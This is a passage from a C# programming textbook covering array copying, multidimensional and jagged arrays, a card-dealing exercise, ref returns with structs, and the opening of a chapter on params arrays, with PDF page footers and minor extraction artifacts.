{
ProcessFile(filename);
}
}
The user can run the MyFileUtil application from the command line
like this:
Click here to view code image
MyFileUtil C:\Temp\TestData.dat
C:\Users\John\Documents\MyDoc.txt
Each command-line argument is separated by a space. It is up to the
MyFileUtil application to verify that these arguments are valid.
Copying arrays
Arrays are reference types (remember that an array is an instance of the
System.Array class). An array variable contains a reference to an array
instance. This means that when you copy an array variable, you actually end
up with two references to the same array instance, as demonstrated in the
following example:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
int[] alias = pins; // alias and pins refer to the same array
instance
In this example, if you modify the value at pins[1], the change will also be
visible by reading alias[1].
If you want to make a copy of the array instance (the data on the heap)
that an array variable refers to, you have to do two things. First, you create a
new array instance of the same type and the same length as the array you are
copying. Second, you copy the data from the original array element by
element to the new array, as in this example:
Download from finelybook [email protected]
370
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
for (int i = 0; i < pins.Length; i++)
{
copy[i] = pins[i];
}
Note that this code uses the Length property of the original array to
specify the size of the new array.
Copying an array is actually a common requirement of many applications
—so much so that the System.Array class provides some useful methods that
you can employ to copy an array. For example, the CopyTo method copies
the contents of one array into another array given a specified starting index.
The following example copies all the elements from the pins array to the copy
array starting at element zero:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
pins.CopyTo(copy, 0);
Another way to copy the values is to use the System.Array static method
named Copy. As with CopyTo, you must initialize the target array before
calling Copy:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
Array.Copy(pins, copy, copy.Length);
Note Be sure that you specify a valid value for the length parameter of
the Aray.Copy method. If you provide a negative value, the method
throws an ArgumentOutOfRangeException exception. If you specify a
value that is greater than the number of elements in the source array, the
method throws an ArgumentException exception.
Download from finelybook [email protected]
371
Yet another alternative is to use the System.Array instance method named
Clone. You can call this method to create an entire array and copy it in one
action:
Click here to view code image
int[] pins = { 9, 3, 7, 2 };
int[] copy = (int[])pins.Clone();
Note Clone methods are described in Chapter 8. The Clone method of
the Array class returns an object rather than Array, which is why you
must cast it to an array of the appropriate type when you use it.
Furthermore, the Clone, CopyTo, and Copy methods all create a shallow
copy of an array (shallow and deep copying are also described in
Chapter 8). If the elements in the array being copied contain references,
the Clone method simply copies the references rather than the objects
being referred to. After copying, both arrays refer to the same set of
objects. If you need to create a deep copy of such an array, you must
use appropriate code in a for loop.
Using multidimensional arrays
The arrays shown so far have contained a single dimension, and you can
think of them as simple lists of values. You can create arrays with more than
one dimension. For example, to create a two-dimensional array, you specify
an array that requires two integer indexes. The following code creates a two-
dimensional array of 24 integers called items. If it helps, you can think of the
array as a table, with the first dimension specifying a number of rows and the
second specifying a number of columns.
int[,] items = new int[4, 6];
To access an element in the array, you provide two index values to specify
the “cell” (the intersection of a row and a column) holding the element. The
following code shows some examples using the items array:
Download from finelybook [email protected]
372
Click here to view code image
items[2, 3] = 99; // set the element at cell(2,3) to 99
items[2, 4] = items [2,3]; // copy the element in cell(2, 3) to
cell(2, 4)
items[2, 4]++; // increment the integer value at cell(2,
4)
There is no limit on the number of dimensions that you can specify for an
array. The next code example creates and uses an array called cube that
contains three dimensions. Notice that you must specify three indexes to
access each element in the array.
Click here to view code image
int[, ,] cube = new int[5, 5, 5];
cube[1, 2, 1] = 101;
cube[1, 2, 2] = cube[1, 2, 1] * 3;
At this point, it is worth offering a word of caution about creating arrays
with more than three dimensions. Specifically, arrays can consume a lot of
memory. The cube array contains 125 elements (5 * 5 * 5). A four-
dimensional array for which each dimension has a size of 5 contains 625
elements. If you start to create arrays with three or more dimensions, you can
soon run out of memory. Therefore, you should always be prepared to catch
and handle OutOfMemoryException exceptions when you use
multidimensional arrays.
Creating jagged arrays
In C#, ordinary multidimensional arrays are sometimes referred to as
rectangular arrays. Each dimension has a regular shape. For example, in the
following tabular, two-dimensional items array, every row has a column
containing 40 elements and there are 160 elements in total:
int[,] items = new int[4, 40];
As mentioned in the previous section, multidimensional arrays can
consume a lot of memory. If the application uses only some of the data in
each column, allocating memory for unused elements is a waste. In this
scenario, you can use a jagged array, for which each column has a different
length, like this:
Click here to view code image
Download from finelybook [email protected]
373
int[][] items = new int[4][];
int[] columnForRow0 = new int[3];
int[] columnForRow1 = new int[10];
int[] columnForRow2 = new int[40];
int[] columnForRow3 = new int[25];
items[0] = columnForRow0;
items[1] = columnForRow1;
items[2] = columnForRow2;
items[3] = columnForRow3;
...
In this example, the application requires only 3 elements in the first
column, 10 elements in the second column, 40 elements in the third column,
and 25 elements in the final column. This code illustrates an array of arrays
—items, instead of being a two-dimensional array, has only a single
dimension, but the elements in that dimension are themselves arrays.
Furthermore, the total size of the items array is 78 elements rather than 160;
no space is allocated for elements that the application is not going to use.
It is worth highlighting some of the syntax in this example. The following
declaration specifies that items is an array of arrays of int.
int[][] items;
The following statement initializes items to hold four elements, each of
which is an array of indeterminate length:
items = new int[4][];
The arrays columnForRow0 to columnForRow3 are all single-dimensional
int arrays, initialized to hold the required amount of data for each column.
Finally, each column array is assigned to the appropriate elements in the
items array, like this:
items[0] = columnForRow0;
Recall that arrays are reference objects, so this statement simply adds a
reference to columnForRow0 to the first element in the items array; it does
not actually copy any data. You can populate data in this column either by
assigning a value to an indexed element in columnForRow0 or by referencing
it through the items array. The following statements are equivalent:
columnForRow0[1] = 99;
items[0][1] = 99;
You can extend this idea further if you want to create arrays of arrays of
Download from finelybook [email protected]
374
arrays rather than rectangular three-dimensional arrays, and so on.
Note If you have written code using the Java programming language in
the past, you should be familiar with this concept. Java does not have
multidimensional arrays; instead, you can create arrays of arrays exactly
as just described.
In the following exercise, you will use arrays to implement an application
that deals playing cards as part of a card game. The application displays a
form with four hands of cards dealt at random from a regular (52 cards) pack
of playing cards. You will complete the code that deals the cards for each
hand.
Use arrays to implement a card game
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Cards solution, which is located in the \Microsoft
Press\VCSBS\Chapter 10\Cards folder in your Documents folder.
3. On the Debug menu, click Start Debugging to build and run the
application.
A form appears with the caption Card Game and four text boxes (labeled
North, South, East, and West). At the bottom is a command bar with an
ellipsis (…). Click the ellipsis to expand the command bar. A button
with the caption Deal should appear:
Download from finelybook [email protected]
375
Note The technique used here is the preferred mechanism for
locating command buttons in Universal Windows Platform (UWP)
apps, and from here on all UWP apps presented in this book will
follow this style.
4. Click Deal.
Nothing happens. You have not yet implemented the code that deals the
cards; this is what you will do in this exercise.
5. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
6. In Solution Explorer, locate the Value.cs file. Open this file in the Code
and Text Editor window.
Download from finelybook [email protected]
376
This file contains an enumeration called Value, which represents the
different values that a card can have, in ascending order:
Click here to view code image
enum Value { Two, Three, Four, Five, Six, Seven, Eight, Nine,
Ten, Jack, Queen, King, Ace }
7. Open the Suit.cs file in the Code and Text Editor window.
This file contains an enumeration called Suit, which represents the suits
of cards in a regular pack:
Click here to view code image
enum Suit { Clubs, Diamonds, Hearts, Spades }
8. Display the PlayingCard.cs file in the Code and Text Editor window.
This file contains the PlayingCard class. This class models a single
playing card.
Click here to view code image
class PlayingCard
{
private readonly Suit suit;
private readonly Value value;
public PlayingCard(Suit s, Value v)
{
this.suit = s;
this.value = v;
}
public override string ToString()
{
string result = $"{this.value} of {this.suit}";
return result;
}
public Suit CardSuit()
{
return this.suit;
}
public Value CardValue()
{
return this.value;
}
Download from finelybook [email protected]
377
}
This class has two readonly fields that represent the value and suit of the
card. The constructor initializes these fields.
Note A readonly field is useful for modeling data that should not
change after it has been initialized. You can assign a value to a
readonly field by using an initializer when you declare it or in a
constructor, but thereafter you cannot change it.
The class contains a pair of methods named CardValue and CardSuit
that return this information, and it overrides the ToString method to
return a string representation of the card.
Note The CardValue and CardSuit methods are actually better
implemented as properties, which you learn how to do in Chapter
15.
9. Open the Pack.cs file in the Code and Text Editor window.
This file contains the Pack class, which models a pack of playing cards.
At the top of the Pack class are two public const int fields called
NumSuits and CardsPerSuit. These two fields specify the number of
suits in a pack of cards and the number of cards in each suit. The private
cardPack variable is a two-dimensional array of PlayingCard objects.
You will use the first dimension to specify the suit and the second
dimension to specify the value of the card in the suit. The
randomCardSelector variable is a random number generated based on
the Random class. You will use the randomCardSelector variable to
help shuffle the cards before they are dealt to each hand.
Download from finelybook [email protected]
378
Click here to view code image
class Pack
{
public const int NumSuits = 4;
public const int CardsPerSuit = 13;
private PlayingCard[,] cardPack;
private Random randomCardSelector = new Random();
...
}
10. Locate the default constructor for the Pack class. Currently this
constructor is empty apart from a // TODO: comment. Delete the
comment, and add the following statement shown in bold to instantiate
the cardPack array with the appropriate values for each dimension:
Click here to view code image
public Pack()
{
this.cardPack = new PlayingCard[NumSuits, CardsPerSuit];
}
11. Add the following code shown in bold to the Pack constructor. These
statements populate the cardPack array with a full, sorted deck of cards.
Click here to view code image
public Pack()
{
this.cardPack = new PlayingCard[NumSuits, CardsPerSuit];
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
for (Value value = Value.Two; value <= Value.Ace;
value++)
{
this.cardPack[(int)suit, (int)value] = new
PlayingCard(suit, value);
}
}
}
The outer for loop iterates through the list of values in the Suit
enumeration, and the inner loop iterates through the values each card
can have in each suit. The inner loop creates a new PlayingCard object
of the specified suit and value and adds it to the appropriate element in
the cardPack array.
Download from finelybook [email protected]
379
Note You must use one of the integer types as indexes into an
array. The suit and value variables are enumeration variables.
However, enumerations are based on the integer types, so it is safe
to cast them to int as shown in the code.
12. Find the DealCardFromPack method in the Pack class. The purpose of
this method is to pick a random card from the pack, remove the card
from the pack to prevent it from being selected again, and then pass it
back as the return value from the method.
The first task in this method is to pick a suit at random. Delete the
comment and the statement that throws the NotImplementedException
exception from this method and replace them with the following
statement shown in bold:
Click here to view code image
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
}
This statement uses the Next method of the randomCardSelector random
number generator object to return a random number corresponding to a
suit. The parameter to the Next method specifies the exclusive upper
bound of the range to use; the value selected is between 0 and this value
minus 1. Note that the value returned is an int, so it has to be cast before
you can assign it a Suit variable.
There is always the possibility that no cards of the selected suit are left.
You need to handle this situation and pick another suit if necessary.
13. After the code that selects a suit at random, add the while loop that
follows (shown in bold).
This loop calls the IsSuitEmpty method to determine whether any cards
of the specified suit are left in the pack (you will implement the logic for
this method shortly). If not, it picks another suit at random (it might
Download from finelybook [email protected]
380
actually pick the same suit again) and checks again. The loop repeats the
process until it finds a suit with at least one card left.
Click here to view code image
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
while (this.IsSuitEmpty(suit))
{
suit = (Suit)randomCardSelector.Next(NumSuits);
}
}
14. You have now selected at random a suit with at least one card left. The
next task is to pick a card at random in this suit. You can use the random
number generator to select a card value, but as before, there is no
guarantee that the card with the chosen value has not already been dealt.
However, you can use the same idiom as before: call the
IsCardAlreadyDealt method (which you will examine and complete
later) to determine whether the card has already been dealt, and if so,
pick another card at random and try again, repeating the process until a
card is found. To do this, add the following statements shown in bold to
the DealCardFromPack method, after the existing code:
Click here to view code image
public PlayingCard DealCardFromPack()
{
...
Value value = (Value)randomCardSelector.Next(CardsPerSuit);
while (this.IsCardAlreadyDealt(suit, value))
{
value = (Value)randomCardSelector.Next(CardsPerSuit);
}
}
15. You have now selected a random playing card that has not been dealt
previously. Add the following code to the end of the
DealCardFromPack method to return this card and set the
corresponding element in the cardPack array to null:
Click here to view code image
public PlayingCard DealCardFromPack()
{
...
Download from finelybook [email protected]
381
PlayingCard card = this.cardPack[(int)suit, (int)value];
this.cardPack[(int)suit, (int)value] = null;
return card;
}
16. Locate the IsSuitEmpty method. Remember that the purpose of this
method is to take a Suit parameter and return a Boolean value indicating
whether there are any more cards of this suit left in the pack. Delete the
comment and the statement that throws the NotImplementedException
exception from this method, and then add the following code shown in
bold:
Click here to view code image
private bool IsSuitEmpty(Suit suit)
{
bool result = true;
for (Value value = Value.Two; value <= Value.Ace; value++)
{
if (!IsCardAlreadyDealt(suit, value))
{
result = false;
break;
}
}
return result;
}
This code iterates through the possible card values and uses the
IsCardAlreadyDealt method (which you will complete in the next step)
to determine whether there is a card left in the cardPack array that has
the specified suit and value. If the loop finds a card, the value in the
result variable is set to false, and the break statement causes the loop to
terminate. If the loop completes without finding a card, the result
variable remains set to its initial value of true. The value of the result
variable is passed back as the return value of the method.
17. Find the IsCardAlreadyDealt method. The purpose of this method is to
determine whether the card with the specified suit and value has already
been dealt and removed from the pack. You will see later that when the
DealCardFromPack method deals a card, it removes the card from the
cardPack array and sets the corresponding element to null. Replace the
body of this method with the code shown in bold:
Download from finelybook [email protected]
382
Click here to view code image
private bool IsCardAlreadyDealt(Suit suit, Value value)
⇒ (this.cardPack[(int)suit, (int)value] == null);
This method returns true if the element in the cardPack array
corresponding to the suit and value is null, and it returns false otherwise.
18. The next step is to add the selected playing card to a hand. Open the
Hand.cs file and display it in the Code and Text Editor window. This file
contains the Hand class, which implements a hand of cards (that is, all
cards dealt to one player).
This file contains a public const int field called HandSize, which is set to
the size of a hand of cards (13). It also contains an array of PlayingCard
objects, which is initialized by using the HandSize constant. The
playingCardCount field will be used by your code to keep track of how
many cards the hand currently contains as it is being populated.
Click here to view code image
class Hand
{
public const int HandSize = 13;
private PlayingCard[] cards = new PlayingCard[HandSize];
private int playingCardCount = 0;
...
}
The ToString method generates a string representation of the cards in the
hand. It uses a foreach loop to iterate through the items in the cards
array and calls the ToString method on each PlayingCard object it finds.
These strings are concatenated with a newline character in between
(using the Environment.NewLine constant to specify the newline
character) for formatting purposes.
Click here to view code image
public override string ToString()
{
string result = "";
foreach (PlayingCard card in this.cards)
{
result += $"{card.ToString()}{Environment.NewLine}";
}
Download from finelybook [email protected]
383
return result;
}
19. Locate the AddCardToHand method in the Hand class. The purpose of
this method is to add the playing card specified as the parameter to the
hand. Delete the comment then add the following statements shown in
bold to this method:
Click here to view code image
public void AddCardToHand(PlayingCard cardDealt)
{
if (this.playingCardCount >= HandSize)
{
throw new ArgumentException("Too many cards");
}
this.cards[this.playingCardCount] = cardDealt;
this.playingCardCount++;
}
This code first checks to ensure that the hand is not already full. If the
hand is full, it throws an ArgumentException exception (this should
never occur, but it is good practice to be safe). Otherwise, the card is
added to the cards array at the index specified by the playingCardCount
variable, and this variable is then incremented.
20. In Solution Explorer, expand the MainPage.xaml node and then open the
MainPage.xaml.cs file in the Code and Text Editor window.
This is the code for the Card Game window. Locate the dealClick
method. This method runs when the user clicks the Deal button.
Currently, it contains an empty try block and an exception handler that
displays a message if an exception occurs.
21. Delete the comment then add the following statement shown in bold to
the try block:
Click here to view code image
private void dealClick(object sender, RoutedEventArgs e)
{
try
{
pack = new Pack();
}
catch (Exception ex)
{
Download from finelybook [email protected]
384
...
}
}
This statement simply creates a new pack of cards. You saw earlier that
this class contains a two-dimensional array holding the cards in the
pack, and the constructor populates this array with the details of each
card. You now need to create four hands of cards from this pack.
22. Add the following statements shown in bold to the try block:
Click here to view code image
try
{
pack = new Pack();
for (int handNum = 0; handNum < NumHands; handNum++)
{
hands[handNum] = new Hand();
,}
}
catch (Exception ex)
{
...
}
This for loop creates four hands from the pack of cards and stores them
in an array called hands. Each hand is initially empty, so you need to
deal the cards from the pack to each hand.
23. Add the following code shown in bold to the for loop:
Click here to view code image
try
{
...
for (int handNum = 0; handNum < NumHands; handNum++)
{
hands[handNum] = new Hand();
for (int numCards = 0; numCards < Hand.HandSize;
numCards++)
{
PlayingCard cardDealt = pack.DealCardFromPack();
hands[handNum].AddCardToHand(cardDealt);
}
}
}
Download from finelybook [email protected]
385
catch (Exception ex)
{
...
}
The inner for loop populates each hand by using the
DealCardFromPack method to retrieve a card at random from the pack
and the AddCardToHand method to add this card to a hand.
24. Add the following code shown in bold after the outer for loop:
Click here to view code image
try
{
...
for (int handNum = 0; handNum < NumHands; handNum++)
{
...
}
north.Text = hands[0].ToString();
south.Text = hands[1].ToString();
east.Text = hands[2].ToString();
west.Text = hands[3].ToString();
}
catch (Exception ex)
{
...
}
When all the cards have been dealt, this code displays each hand in the
text boxes on the form. These text boxes are called north, south, east,
and west. The code uses the ToString method of each hand to format the
output.
If an exception occurs at any point, the catch handler displays a message
box with the error message for the exception.
25. On the Debug menu, click Start Debugging. When the Card Game
window appears, expand the command bar and click Deal.
The cards in the pack should be dealt at random to each hand, and the
cards in each hand should be displayed on the form, similarly as shown
in the following image:
Download from finelybook [email protected]
386
26. Click Deal again. Verify that a new set of hands is dealt and the cards in
each hand change.
27. Return to Visual Studio and stop debugging.
Accessing arrays that contain value types
You can think of an array as a simple collection of data, ordered by an index.
You can easily retrieve an item if you know its index, but if you want to find
data based on some other attribute, then you typically have to implement a
helper method that performs the search and returns the index of the required
item.
As an example, consider the following code that creates an array of
Person objects, where Person is a class:
Click here to view code image
class Person
{
public string Name;
Download from finelybook [email protected]
387
public int Age;
public Person(string name, int age)
{
this.Name = name;
this.Age = age;
}
}
...
Person[] family = new[] {
new Person("John", 53),
new Person("Diana", 53),
new Person("James", 26),
new Person("Francesca", 23)
};
You want to find the youngest member of the family in the Person array,
so you write the following method:
Click here to view code image
Person findYoungest()
{
int youngest = 0;
for (int i = 1; i < family.Length; i++)
{
if (family[i].Age < family[youngest].Age)
{
youngest = i;
}
}
return family[youngest];
}
You can then call this method and display the results in the following
manner:
Click here to view code image
var mostYouthful = findYoungest();
Console.WriteLine($"Name: {mostYouthful.Name}, Age:
{mostYouthful.Age}");
Hopefully, this displays the following result:
Name: Francesca, Age: 23
This is all very satisfactory and works well. Next, you decide that you
want to update the age of the youngest family member (Francesca has just
had her birthday and is now 24), so you write the following statement:
Download from finelybook [email protected]
388
mostYouthful.Age++;
Finally, to confirm that everything has been changed correctly, you use
the following statements to iterate through the family array and display its
contents:
Click here to view code image
foreach (Person familyMember in family)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
You are pleased to observe that the results are correct, and Francesca’s
age has been modified:
Click here to view code image
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 24
At this point, you have a rethink about the Person class and decide it
should really be a struct, so you change it:
Click here to view code image
struct Person
{
public string Name;
public int Age;
public Person(string name, int age)
{
this.Name = name;
this.Age = age;
}
}
Your code compiles and runs, but you notice that Francesca’s age is no
longer being updated; the output of the foreach loop looks like this:
Click here to view code image
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 23
Download from finelybook [email protected]
389
The issue is that you have converted a reference type into a value type.
The data in the family array has changed from being a set of references to
objects on the heap to copies of data on the stack. The value returned by the
findYoungest method was originally a reference to a Person object, and the
increment operation on the Age field made through that reference updated the
original object on the heap. Now the family array contains value types, and
the value returned by the findYoungest method is a copy of the item in the
array rather than a reference. So, when the increment operation is performed
on the Age field, this operation updates a copy of the Person and not the item
stored in the family array.
To handle this situation, you can amend the findYoungest method to
explicitly return a reference to the value type rather than a copy. You can
achieve this by using the ref keyword, as follows:
Click here to view code image
ref Person findYoungest()
{
int youngest = 0;
for (int i = 1; i < family.Length; i++)
{
if (family[i].Age < family[youngest].Age)
{
youngest = i;
}
}
return ref family[youngest];
}
Note that most of the code is unchanged. The return type of the method
has changed to ref Person (a reference to a Person), and the return statement
similarly states that it passes back a reference to the youngest item in the
family array.
When you call the method, you must make a couple of corresponding
changes:
Click here to view code image
ref var mostYouthful = ref findYoungest();
These modifications indicate that mostYouthful is a reference to an item in
the family array. You access the fields in this item in the same way as before;
the C# compiler knows that it should dereference that the data through the
Download from finelybook [email protected]
390
variable. The result is that the increment statement below updates the data in
the array rather than a copy:
mostYouthful.Age++;
When you print out the contents of the array, Francesca’s age has
changed:
Click here to view code image
foreach (Person familyMember in family)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 24
Returning reference data from a method in this way is a powerful
technique, but you must treat it with care. You can only return a reference to
data that still exists when the method has finished, such as an element in an
array. For example, you cannot return a reference to a local variable created
on the stack by the method:
Click here to view code image
// Don't try this; it won't compile
ref int danglingReference()
{
int i;
... // Calculate a value using i
return ref i;
}
This was a common problem in older C programs, known as a “dangling
reference.” Fortunately, the C# compiler prevents you from committing
errors such as this!
Summary
In this chapter, you learned how to create and use arrays to manipulate sets of
data. You saw how to declare and initialize arrays, access data held in arrays,
Download from finelybook [email protected]
391
pass arrays as parameters to methods, and return arrays from methods. You
also learned how to create multidimensional arrays and how to use arrays of
arrays.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 11.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare an array
variable
Write the name of the element type, followed by square
brackets, followed by the name of the variable, followed
by a semicolon. For example:
bool[] flags;
Create an
instance of an
array
Write the keyword new, followed by the name of the
element type, followed by the size of the array enclosed
in square brackets. For example:
bool[] flags = new bool[10];
Initialize the
elements of an
array to specific
values
For an array, write the specific values in a comma-
separated list enclosed in braces. For example:
Click here to view code image
bool[] flags = { true, false, true, false };
Find the number
of elements in an
array
Use the Length property. For example:
Click here to view code image
bool[] flags = ...;
...
int noOfElements = flags.Length;
Access a single
array element
Write the name of the array variable, followed by the
integer index of the element enclosed in square brackets.
Remember, array indexing starts at 0, not 1. For
Download from finelybook [email protected]
392
example:
bool initialElement = flags[0];
Iterate through
the elements of
an array
Use a for statement or a foreach statement. For example:
Click here to view code image
bool[] flags = { true, false, true, false };
for (int i = 0; i < flags.Length; i++)
{
Console.WriteLine(flags[i]);
}
foreach (bool flag in flags)
{
Console.WriteLine(flag);
}
Declare a
multidimensional
array variable
Write the name of the element type, followed by a set of
square brackets with a comma separator indicating the
number of dimensions, followed by the name of the
variable, followed by a semicolon. For example, use the
following to create a two-dimensional array called table
and initialize it to hold 4 rows of 6 columns:
Click here to view code image
int[,] table;
table = new int[4,6];
Declare a jagged
array variable
Declare the variable as an array of child arrays. You can
initialize each child array to have a different length. For
example, use the following to create a jagged array
called items and initialize each child array:
Click here to view code image
int[][] items;
items = new int[4][];
items[0] = new int[3];
items[1] = new int[10];
items[2] = new int[40];
items[3] = new int[25];
Download from finelybook [email protected]
393
CHAPTER 11
Understanding parameter arrays
After completing this chapter, you will be able to:
Write a method that can accept any number of arguments by using the
params keyword.
Write a method that can accept any number of arguments of any type
by using the params keyword in combination with the object type.
Explain the differences between methods that take parameter arrays
and methods that take optional parameters.
Parameter arrays are useful if you want to write methods that can take any
number of arguments, possibly of different types, as parameters. If you are
familiar with object-oriented concepts, you might be grinding your teeth in
frustration at the previous sentence. After all, the object-oriented approach to
solving this problem is to define overloaded methods. However, overloading
is not always the most suitable approach, especially if you need to create a
method that can take a truly variable number of parameters, each of which
might vary in type whenever the method is invoked. This chapter describes
how you can use parameter arrays to address situations such as this.
Overloading—a recap
Overloading is the technical term for declaring two or more methods with the
same name in the same scope. Overloading a method is very useful for cases
in which you want to perform the same action on arguments of different
Download from finelybook [email protected]
394
types. The classic example of overloading in Microsoft Visual C# is the
Console.WriteLine method. This method is overloaded numerous times so
that you can pass any primitive type argument. The following code example
illustrates some of the ways in which the WriteLine method is defined in the
Console class:
Click here to view code image
class Console
{
public static void WriteLine(Int32 value)
public static void WriteLine(Double value)
public static void WriteLine(Decimal value)
public static void WriteLine(Boolean value)
public static void WriteLine(String value)
...
}
Note The documentation for the WriteLine method uses the structure
types defined in the System namespace for its parameters rather than the
C# aliases for these types. For example, the overload that prints out the
value for an int actually takes an Int32 as the parameter. Refer to
Chapter 9, “Creating value types with enumerations and structures,” for
a list of the structure types and their mappings to C# aliases for these
types.
As useful as overloading is, it doesn’t cover every case. In particular,
overloading doesn’t easily handle a situation in which the type of parameters
doesn’t vary, but the number of parameters does. For example, what if you
want to write many values to the console? Do you have to provide versions of
Console.WriteLine that can take two parameters of various combinations,
other versions that can take three parameters, and so on? That would quickly
become tedious. And wouldn’t the massive duplication of these overloaded
methods worry you? It should. Fortunately, there is a way to write a method
that takes a variable number of arguments (a variadic method): you can use a
parameter array, which is declared by using the params keyword.
Download from finelybook [email protected]
395
To understand how params arrays solve this problem, it helps first to
understand the uses and shortcomings of ordinary arrays.
Using array arguments
Suppose that you want to write a method to determine the minimum value in
a set of values passed as parameters. One way is to use an array. For
example, to find the smallest of several int values, you could write a static
method named Min with a single parameter representing an array of int
values:
Click here to view code image
class Util
{
public static int Min(int[] paramList)
{
// Verify that the caller has provided at least one
parameter.
// If not, throw an ArgumentException exception – it is not
possible
// to find the smallest value in an empty list.
if (paramList == null || paramList.Length == 0)
{
throw new ArgumentException("Util.Min: not enough
arguments");
}
// Set the current minimum value found in the list of
parameters to the first item
int currentMin = paramList[0];
// Iterate through the list of parameters, searching to see
whether any of them
// are smaller than the value held in currentMin
foreach (int i in paramList)
{
// If the loop finds an item that is smaller than the
value held in
// currentMin, then set currentMin to this value
if (i < currentMin)
{
currentMin = i;
}
}
// At the end of the loop, currentMin holds the value of the
smallest
Download from finelybook [email protected]
396
// item in the list of parameters, so return this value.
return currentMin;
}
}
Note The ArgumentException class is specifically designed to be
thrown by a method if the arguments supplied do not meet the
requirements of the method.
To use the Min method to find the minimum of two int variables named
first and second, you can write this:
Click here to view code image
int[] array = new int[2];
array[0] = first;
array[1] = second;
int min = Util.Min(array);
And to use the Min method to find the minimum of three int variables
(named first, second, and third), you can write this:
Click here to view code image
int[] array = new int[3];
array[0] = first;
array[1] = second;
array[2] = third;
int min = Util.Min(array);
You can see that this solution avoids the need for a large number of
overloads, but it does so at a price: you have to write additional code to
populate the array that you pass in. You can, of course, use an anonymous
array if you prefer, like this:
Click here to view code image
int min = Util.Min(new int[] {first, second, third});
However, the point is that you still need to create and populate an array,
and the syntax can get a little confusing. The solution is to get the compiler to
write some of this code for you by using a params array as the parameter to
Download from finelybook [email protected]
397
the Min method.
Declaring a params array
Using a params array, you can pass a variable number of arguments to a
method. You indicate a params array by using the params keyword as an
array parameter modifier when you define the method parameters. For
example, here’s Min again—this time with its array parameter declared as a
params array:
Click here to view code image
class Util
{
public static int Min(params int[] paramList)
{
// code exactly as before
}
}
The effect of the params keyword on the Min method is that it allows you
to call the method by using any number of integer arguments without
worrying about creating an array. For example, to find the minimum of two
integer values, you can simply write this:
int min = Util.Min(first, second);
The compiler translates this call into code similar to this:
Click here to view code image
int[] array = new int[2];
array[0] = first;
array[1] = second;
int min = Util.Min(array);
To find the minimum of three integer values, you write the code shown
here, which is also converted by the compiler to the corresponding code that
uses an array:
Click here to view code image
int min = Util.Min(first, second, third);
Both calls to Min (one call with two arguments and the other with three
arguments) resolve to the same Min method with the params keyword. And,
Download from finelybook [email protected]
398
as you can probably guess, you can call this Min method with any number of
int arguments. The compiler just counts the number of int arguments, creates
an int array of that size, fills the array with the arguments, and then calls the
method by passing the single array parameter.
Note If you’re a C or C++ programmer, you might recognize params as
a type-safe equivalent of the varargs macros from the header file
stdarg.h. Java also has a varargs facility that operates similarly to the
params keyword in C#.
There are several points worth noting about params arrays:
You can’t use the params keyword with multidimensional arrays. The
code in the following example will not compile:
Click here to view code image
// compile-time error
public static int Min(params int[,] table)
...
You can’t overload a method based solely on the params keyword. The
params keyword does not form part of a method’s signature, as shown
in this example. Here, the compiler would not be able to distinguish
between these methods in code that calls them:
Click here to view code image
// compile-time error: duplicate declaration
public static int Min(int[] paramList)
...
public static int Min(params int[] paramList)
...
You’re not allowed to specify the ref or out modifier with params
arrays, as shown in this example:
Click here to view code image
// compile-time errors
public static int Min(ref params int[] paramList)
Download from finelybook [email protected]
399
...
public static int Min(out params int[] paramList)
...
A params array must be the last parameter. (This means that you can
have only one params array per method.) Consider this example:
Click here to view code image
// compile-time error
public static int Min(params int[] paramList, int i)
...
A non-params method always takes priority over a params method.
This means that you can still create an overloaded version of a method
for the common cases, such as in the following example:
Click here to view code image
public static int Min(int leftHandSide, int rightHandSide)
...
public static int Min(params int[] paramList)
...
The first version of the Min method is used when it’s called using two
int arguments. The second version is used if any other number of int
arguments is supplied. This includes the case in which the method is
called with no arguments. Adding the non-params array method might
be a useful optimization technique because the compiler won’t have to
create and populate so many arrays.
Using params object[ ]
A parameter array of type int is very useful. With it, you can pass any number
of int arguments in a method call. However, what if not only the number of
arguments varies but also the argument type? C# has a way to solve this
problem, too. The technique is based on the facts that object is the root of all
classes and that the compiler can generate code that converts value types
(things that aren’t classes) to objects by using boxing, as described in Chapter
8, “Understanding values and references.” You can use a parameters array of
type object to declare a method that accepts any number of object arguments,
allowing the arguments passed in to be of any type. Look at this example:
Click here to view code image
Download from finelybook [email protected]
400
class Black
{
public static void Hole(params object[] paramList)
...
}
I’ve called this method Black.Hole because no argument can escape from
it:
You can pass the method no arguments at all, in which case the
compiler will pass an object array whose length is 0:
Click here to view code image
Black.Hole(); // converted to Black.Hole(new object[0]);
You can call the Black.Hole method by passing null as the argument.
An array is a reference type, so you’re allowed to initialize an array
with null:
Black.Hole(null);
You can pass the Black.Hole method an actual array. In other words,
you can manually create the array normally generated by the compiler:
Click here to view code image
object[] array = new object[2];
array[0] = "forty two";
array[1] = 42;
Black.Hole(array);
You can pass the Black.Hole method arguments of different types and
these arguments will automatically be wrapped inside an object array:
Click here to view code image
Black.Hole("forty two", 42);
//converted to Black.Hole(new object[]{"forty two", 42});
The Console.WriteLine method
The Console class contains many overloads for the WriteLine method.
One of these overloads looks like this:
Click here to view code image
public static void WriteLine(string format, params object[]
Download from finelybook [email protected]
401
arg);
Although string interpolation has very nearly made this version of
the WriteLine method redundant, this overload was frequently used in
previous editions of the C# language. This overload enables the
WriteLine method to support a format string argument that contains
numeric placeholders, each of which can be replaced at runtime with a
